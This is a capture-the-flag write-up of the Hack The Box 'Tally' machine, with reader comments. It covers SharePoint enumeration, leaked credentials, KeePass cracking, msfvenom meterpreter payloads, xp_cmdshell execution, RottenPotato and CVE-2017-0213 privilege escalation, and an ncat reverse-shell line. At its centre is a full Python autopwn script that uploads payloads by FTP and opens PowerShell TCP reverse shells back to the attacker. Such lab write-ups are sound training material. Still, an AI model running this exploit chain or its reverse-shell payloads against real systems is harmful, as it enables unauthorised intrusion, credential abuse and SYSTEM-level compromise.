Tally write-up by Alamot

Enumeration

Port scanning

Let’s scan the full range of TCP ports using my tool htbscan.py (you can find it here: code-snippets/htbscan.py at master · Alamot/code-snippets · GitHub):

$ sudo ./htbscan.py 10.10.10.59 300

Running command: sudo masscan -e tun0 -p0-65535 --max-rate 300 --interactive 10.10.10.59

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-05-03 12:04:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 49668/tcp on 10.10.10.59                                  
Discovered open port 80/tcp on 10.10.10.59                                     
Discovered open port 445/tcp on 10.10.10.59                                    
Discovered open port 32843/tcp on 10.10.10.59                                  
Discovered open port 49665/tcp on 10.10.10.59                                  
Discovered open port 1433/tcp on 10.10.10.59                                   
Discovered open port 135/tcp on 10.10.10.59                                    
Discovered open port 32844/tcp on 10.10.10.59                                  
Discovered open port 81/tcp on 10.10.10.59                                     
Discovered open port 49667/tcp on 10.10.10.59                                  
Discovered open port 32846/tcp on 10.10.10.59                                  
Discovered open port 49666/tcp on 10.10.10.59                                  
Discovered open port 49666/tcp on 10.10.10.59                                  
Discovered open port 47001/tcp on 10.10.10.59                                  
Discovered open port 15567/tcp on 10.10.10.59                                  
Discovered open port 49664/tcp on 10.10.10.59                                  
Discovered open port 139/tcp on 10.10.10.59                                    
Discovered open port 49670/tcp on 10.10.10.59                                  
                                                                             
Running command: sudo nmap -A -p80,81,135,139,445,1433,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49670 10.10.10.59

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-03 15:11 EEST
Nmap scan report for 10.10.10.59
Host is up (0.12s latency).

PORT      STATE SERVICE              VERSION
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s             Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-05-03T10:47:41
|_Not valid after:  2048-05-03T10:47:41
|_ssl-date: 2018-05-03T12:12:35+00:00; +3s from scanner time.
15567/tcp open  http                 Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site does not have a title.
32843/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2018-05-03T12:12:37+00:00; +3s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc                Microsoft Windows RPC
49665/tcp open  msrpc                Microsoft Windows RPC
49666/tcp open  msrpc                Microsoft Windows RPC
49667/tcp open  msrpc                Microsoft Windows RPC
49668/tcp open  msrpc                Microsoft Windows RPC
49670/tcp open  msrpc                Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-05-03 15:12:36
|_  start_date: 2018-05-03 13:47:08

Brute forcing Microsoft SharePoint

We see that Microsoft SharePoint is on the box. Let’s download the SharePointURLBrute tool from here:
https://www.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/

$ perl SharePointURLBrute\ v1.1.pl  -a http://10.10.10.59 -e SharePoint-UrlExtensions-18Mar2012.txt

Starting search for common SharePoint Pages
Start Time: Sun Nov  5 11:37:15 2017

FOUND: http://10.10.10.59/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_layouts/AreaNavigationSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaTemplateSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaWelcomePage.aspx
FOUND: http://10.10.10.59/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://10.10.10.59/_layouts/MyInfo.aspx
FOUND: http://10.10.10.59/_layouts/MyPage.aspx
FOUND: http://10.10.10.59/_layouts/PageSettings.aspx
FOUND: http://10.10.10.59/_layouts/policy.aspx
FOUND: http://10.10.10.59/_layouts/policyconfig.aspx
FOUND: http://10.10.10.59/_layouts/policycts.aspx
FOUND: http://10.10.10.59/_layouts/Policylist.aspx
FOUND: http://10.10.10.59/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://10.10.10.59/_layouts/SiteDirectorySettings.aspx
FOUND: http://10.10.10.59/_layouts/sitemanager.aspx
FOUND: http://10.10.10.59/_Layouts/SiteManager.aspx?lro=all
FOUND: http://10.10.10.59/_vti_bin/alerts.asmx
FOUND: http://10.10.10.59/_vti_bin/dspsts.asmx
FOUND: http://10.10.10.59/_vti_bin/forms.asmx
FOUND: http://10.10.10.59/_vti_bin/Lists.asmx
FOUND: http://10.10.10.59/_vti_bin/people.asmx
FOUND: http://10.10.10.59/_vti_bin/Permissions.asmx
FOUND: http://10.10.10.59/_vti_bin/search.asmx
FOUND: http://10.10.10.59/_vti_bin/UserGroup.asmx
FOUND: http://10.10.10.59/_vti_bin/versions.asmx
FOUND: http://10.10.10.59/_vti_bin/Views.asmx
FOUND: http://10.10.10.59/_vti_bin/webpartpages.asmx
FOUND: http://10.10.10.59/_vti_bin/webs.asmx
FOUND: http://10.10.10.59/_vti_bin/SharepointEmailWS.asmx
FOUND: http://10.10.10.59/_vti_bin/spsearch.asmx
FOUND: http://10.10.10.59/_vti_bin/WebPartPages.asmx
FOUND: http://10.10.10.59/default.aspx
FOUND: http://10.10.10.59/shared documents/forms/allitems.aspx

Getting FTP credentials

If we open the http://10.10.10.59/shared%20documents/forms/allitems.aspx, we see a file named “ftp-details” modified by tally\administrator. Let’s download it and see what there is inside:

FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

Now, we know the FTP password but we lack the username. If we set a cookie named “mobile” equal to 1 (i.e. mobile=1) and reload the site, a gear appears at the top-right corner. We can click on that gear and select “Site Contents” and then “Site Pages”. There, we find an interesting link named “FinanceTeam.aspx” (again by tally\administrator). I originally found the gear by emulating a mobile device via my browser (using developer tools, google it if you don’t know what I am talking about). When I reloaded the site, the gear appeared at the top-right corner.

Let’s visit that link: http://10.10.10.59/_layouts/15/mobile/mblwikia.aspx?Url=%2FSitePages%2FFinanceTeam.aspx&Source=%2F_layouts%2F15%2Fmobile%2Fviewa.aspx%3FList%3D076fa50e%252Dcea0%252D431a%252Dad18%252Dd528cf893d4c%26View%3Dee7b270d%252D91a9%252D482d%252Db7f2%252Df905c4b15281

Migration update

Hi all,

Welcome to your new team page!

As always, there's still a few finishing touches to make.  Rahul - please upload the design mock ups to the Intranet folder as 'index.html' using the ftp_user account - I aim to review regularly.

We'll also add the fund and client account pages in due course.

Thanks – Sarah & Tim.

Therefore our FTP credentials are ftp_user:UTDRSCH53c"$6hys

Getting SMB credentials

Connect using FTP and have a look in /User/Tim/log/do to.txt

To do:
Remove migration folder
Set secure share permissions
encrypted share creds:
password in keepass

Let’s download /User/Tim/Files/tim.kdbx and crack it:

keepass2john tim.kdbx > hash
john --format=KeePass --wordlist=/usr/share/dict/rockyou.txt hash
tim:simplementeyo

Now open tim.kbdx using keepass (Master password: simplementeyo)

$ keepass tim.kbdx

Go to Database → WORK → WINDOWS → Shares. Here, we found some SMB credentials Finance:Acc0unting (right click and copy password to get the password)

Getting MSSQL credentials

Let’s connect to SMB:

$ smbclient -U Finance \\\\10.10.10.59\\ACCT

or

$ sudo mount -t cifs //10.10.10.59/ACCT /mnt/TEMP -o,user=Finance,password=Acc0unting,vers=2.0

Inside the smb:\zz_Migration\Binaries\new Folder\tester.exe we find this:

...
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
...

This means our MSSQL credentials are sa:GWE3V65#6KFH93@4GWTG2G

Getting shell

Let’s make a meterpreter payload using msfvenom. If we use the psh-reflection format our payload invade the antivirus detection:

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=60000 -f psh-reflection -o msf.ps1

Don’t forget to set up your listener using exploit/multi/handler:

msf> use exploit/multi/handler
msf exploit(handler) > options

Module options (exploit/multi/handler):

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.105     yes       The listen address
   LPORT     60000            yes       The listen port

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 127.0.0.1:6000

Now, upload msf.ps1 to /Intranet via FTP. We can execute our payload via MSSQL:

$ msfconsole
msf> use  auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set CMD "powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\msf.ps1"
msf auxiliary(mssql_exec) > info

Basic options:
  Name             Current Setting
  ----             ---------------
  CMD              powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1
  PASSWORD         GWE3V65#6KFH93@4GWTG2G
  RHOST            10.10.10.59
  RPORT            1433
  TDSENCRYPTION    false
  USERNAME         sa
  USE_WINDOWS_AUTH false

msf auxiliary(mssql_exec) > exploit

And here is our meterpreter shell:

meterpreter > sysinfo
Computer        : TALLY
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_GB
Domain          : HTB.LOCAL
Logged On Users : 7
Meterpreter     : x64/windows

Privilege Escalation

Using Incognito and RottenPotato

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeImpersonatePrivilege
  SeIncreaseQuotaPrivilege
  SeIncreaseWorkingSetPrivilege

meterpreter > cd C:\\Users\\Sarah\\Desktop
meterpreter > upload rottenpotato.exe
[*] uploading  : /root/Downloads/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] uploaded   : /root/Downloads/RottenPotato/rottenpotato.exe -> rottenpotato.exe

meterpreter > load incognito
Loading extension incognito...success.

meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
TALLY\Sarah

Impersonation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT

meterpreter > execute -Hc -f C:\\Temp\\rottenpotato.exe
Process 7996 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT SERVICE\SQLSERVERAGENT

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3452 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Sarah\Desktop> whoami
nt authority\system :D

Using CVE-2017-213

We can also use CVE-2017-213 for privilege escalation:

  1. Get Exploits/CVE-2017-0213.cpp at master · WindowsExploits/Exploits · GitHub

  2. Change the cmdline in CVE-2017-0213.cpp to run ncat or a powershell script to get a remote shell. E.g.:

WCHAR cmdline[] = "C:\\Users\\Sarah\\Desktop\\ncat.exe 10.10.14.190 60002 -e cmd.exe"

or

WCHAR cmdline[] = L"powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\shell.ps1";
  1. Compile it, upload it and copy it in a folder where user has write permissions.

  2. Migrate your existing shell to another process (Important! Otherwise it doesn’t work.)

  3. Set up the listener on your side.

  4. Execute CVE-2017-213.exe

Autopwn script

You can download my autopwn script (and the other required files) from here: code-snippets/hacking/HTB/Tally at master · Alamot/code-snippets · GitHub

(Don’t forget to set LHOST appropriately. If you are using a Linux OS, the script tries to automatically get the LHOST IP from the tun0 interface).

#!/usr/bin/env python2
# Author: Alamot
import sys
import uuid
import fcntl
import _mssql
import signal
import ftplib
from pwn import *
from subprocess import call
from base64 import b64encode
signal.signal(signal.SIGINT, signal.SIG_DFL)


def get_ip_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(
        s.fileno(),
        0x8915,  # SIOCGIFADDR
        struct.pack('256s', ifname[:15].encode())
    )[20:24])


#LHOST = "10.10.15.247"
LHOST = get_ip_address('tun0')
LPORT1="60000"
LPORT2="60001"
LPORT3="60002"
FTP_SERVER = "10.10.10.59"
FTP_USERNAME = "ftp_user"
FTP_PASSWORD = "UTDRSCH53c\"$6hys"
FTP_UPLOADPATH = "Intranet"
MSSQL_SERVER = "10.10.10.59:1433"
MSSQL_USERNAME = "sa"
MSSQL_PASSWORD = "GWE3V65#6KFH93@4GWTG2G"
TIMEOUT = 60


def get_ps_payload(lost, lport):
    return "$client = New-Object System.Net.Sockets.TCPClient('"+lost+"',"+lport+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"

payload1 = get_ps_payload(LHOST, LPORT1)
payload2 = get_ps_payload(LHOST, LPORT2)
payload3 = get_ps_payload(LHOST, LPORT3)

def initiate():
    unique_filename1 = "msf1.ps1"
    unique_filename2 = "msf2.ps1"
    with open(unique_filename1,'wt') as f:
        f.write(payload1)
    with open(unique_filename2,'wt') as f:
        f.write(payload3)
        
    ftp = None
    try:
        ftp = ftplib.FTP(FTP_SERVER,FTP_USERNAME,FTP_PASSWORD)
        log.success("Successful login at ftp server "+FTP_SERVER+" with username '"+FTP_USERNAME+"' and password '"+FTP_PASSWORD+"'")
        log.info("Changing current working directory to " + FTP_UPLOADPATH)
        ftp.cwd('/'+FTP_UPLOADPATH)
        
        log.info("Uploading "+unique_filename1)
        with open(unique_filename1,'rb') as f:         
            ftp.storbinary('STOR '+unique_filename1, f)

        log.info("Uploading Invoke-PSInject.ps1")
        with open("Invoke-PSInject.ps1",'rb') as f:         
            ftp.storbinary("STOR Invoke-PSInject.ps1", f)
            
        log.info("Uploading "+unique_filename2)
        with open(unique_filename2,'rb') as f:         
            ftp.storbinary('STOR '+unique_filename2, f)
            
        log.info("Uploading cve2017213ps.exe")
        with open("cve2017213ps.exe",'rb') as f:         
            ftp.storbinary("STOR cve2017213ps.exe", f)

            
    except Exception as e:
        log.failure("FTP failed: "+str(e))
    finally:
        if ftp:
            ftp.quit()


    mssql = None
    try:
        mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
        log.success("Successful login at mssql server "+MSSQL_SERVER+" with username '"+MSSQL_USERNAME+"' and password '"+MSSQL_PASSWORD+"'")
        log.info("Enabling 'xp_cmdshell'")
        mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE -- ")
        mssql.execute_query("EXEC master..xp_cmdshell 'powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\"+FTP_UPLOADPATH+"\\"+unique_filename1+"'")
    except Exception as e:
        log.failure("MSSQL failed: "+str(e))
    finally:
        if mssql:
            mssql.close()


log.info("LHOST = "+LHOST)

try:
    threading.Thread(target=initiate).start()
except Exception as e:
    log.error(str(e))
    
ps1 = listen(LPORT1, timeout=TIMEOUT).wait_for_connection()
if ps1.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps1.sendline("cd C:\\FTP\\"+FTP_UPLOADPATH+"\\")
ps1.sendline(". .\\Invoke-PSInject.ps1")
ps1.sendline("Invoke-PSInject -ProcName sihost -PoshCode "+b64encode(payload2.encode('UTF-16LE')))

ps2 = listen(LPORT2, timeout=TIMEOUT).wait_for_connection()
if ps2.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps2.sendline("copy C:\\FTP\\"+FTP_UPLOADPATH+"\\cve2017213ps.exe C:\\TEMP\\cve2017213ps.exe")
ps2.sendline("cd C:\\TEMP\\")
ps2.sendline(". .\\cve2017213ps.exe")

ps3 = listen(LPORT3, timeout=TIMEOUT).wait_for_connection()
if ps3.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps3.interactive()

sys.exit()

Here is the output:

[*] LHOST = 10.10.15.247
[+] Trying to bind to 0.0.0.0 on port 60000: Done
[+] Waiting for connections on 0.0.0.0:60000: Got connection from 10.10.10.59 on port 50143
[+] Successful login at ftp server 10.10.10.59 with username 'ftp_user' and password 'UTDRSCH53c"$6hys'
[*] Changing current working directory to Intranet
[*] Uploading msf1.ps1
[*] Uploading Invoke-PSInject.ps1
[*] Uploading msf2.ps1
[*] Uploading cve2017213ps.exe
[+] Successful login at mssql server 10.10.10.59:1433 with username 'sa' and password 'GWE3V65#6KFH93@4GWTG2G'
[*] Enabling 'xp_cmdshell'
[+] Trying to bind to 0.0.0.0 on port 60001: Done
[+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.59 on port 50154
[+] Trying to bind to 0.0.0.0 on port 60002: Done
[+] Waiting for connections on 0.0.0.0:60002: Got connection from 10.10.10.59 on port 50161
[*] Switching to interactive mode
$ whoami
nt authority\system
PS C:\Windows\system32$

What about exploiting Firefox

On the box, there is Firefox version 44.0.2 and a script automatically opens C:\FTP\Intranet\index.html every now and then:

C:\Users\Sarah\Desktop> type browser.bat
...
REM copy latest mockups to webroot
copy /Y C:\FTP\Intranet\index.html C:\inetpub\wwwroot\HRTJYKYRBSHYJ\index.html

REM browse file
start "" "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" "http://127.0.0.1:81/HRTJYKYRBSHYJ/index.html"
...

In theory, we could exploit it by uploading an evil index.html via the FTP.

$ searchsploit firefox 44.0.2 -w

Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution https://www.exploit-db.com/exploits/44294/

Unfortunately, I was not able to make it work. I even enabled RDP on the box and I connected to check what is going on. The exploit is opened normally but the firefox either crashes or it doesn’t execute the payload properly.

Solid writeup as usual, alamot!
One can also use Metasploit’s mssql_clr_payload module to pop a shell, although it’s not as reliable.

Nice writeup, a small observation going through the machine is that if you pull the “tim.kdbx” through the ftp in “ASCII” mode it generates an entirely different hash with “keepass2john” and it doesnt crack the password
A silly thing to lose hours of troubleshooting but i guess i learned something :stuck_out_tongue:

Hi, am not able to get NT AUTHORITY SYSTEM under Impersonation Tokens Available, after executing rottenpotato.exe tried several times what could be the reason ?

that’s probably because you need to be fast, make sure you have the flags from execute -Hc -f C:\\Temp\\rottenpotato.exe and execute impersonate_token “NT AUTHORITY\SYSTEM” immediately after

Hi, thanks for your writeup. I have tried your script. But it always failed at the last step: wait 60002 port to connect. It keeps timeout. I cannot figure out the reason.